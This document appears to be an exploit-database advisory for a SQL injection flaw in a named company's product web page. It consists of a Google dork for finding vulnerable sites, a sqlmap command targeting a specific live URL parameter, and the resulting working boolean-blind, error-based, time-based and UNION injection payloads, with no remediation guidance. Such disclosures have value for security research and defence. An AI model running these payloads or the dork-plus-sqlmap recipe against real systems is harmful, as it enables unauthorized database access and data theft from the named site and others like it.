********************************************************* #Exploit Title:Futronic Technology Company Limited. - Sql Injection Vulnerability #Date: 2022-02-26 #Exploit Author: Jayson San Buenaventura #Google Dork: "Futronic Technology Company Limited." #Category:webapps #Tested On: Kali Linux, CyberFox Proof of Concept: Search google Dork: "Futronic Technology Company Limited." ### Demo : sqlmap -u 'https://www.futronic-tech.com/pro-detail.php?pro_id=1543' --dbs --random-agent Parameter: pro_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: pro_id=1543 AND 5828=5828 Type: error-based Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED) Payload: pro_id=1543 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707871,(SELECT (ELT(6573=6573,1))),0x716b6b7671,0x78))s), 8446744073709551610, 8446744073709551610))) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: pro_id=1543 AND (SELECT 8647 FROM (SELECT(SLEEP(5)))tjaj) Type: UNION query Title: Generic UNION query (NULL) - 20 columns Payload: pro_id=1543 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162707871,0x6164696478734969614d77504a4e4f726a4d4c4c4e50746a50746c514d6f456758546844766f644a,0x716b6b7671),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - --- ********************************************************* #Discovered by: Jayson San Buenaventura #Facebook: Jayson Cabrillas San Buenaventura #Email: sanbuenaventurajayson27@gmail.com *********************************************************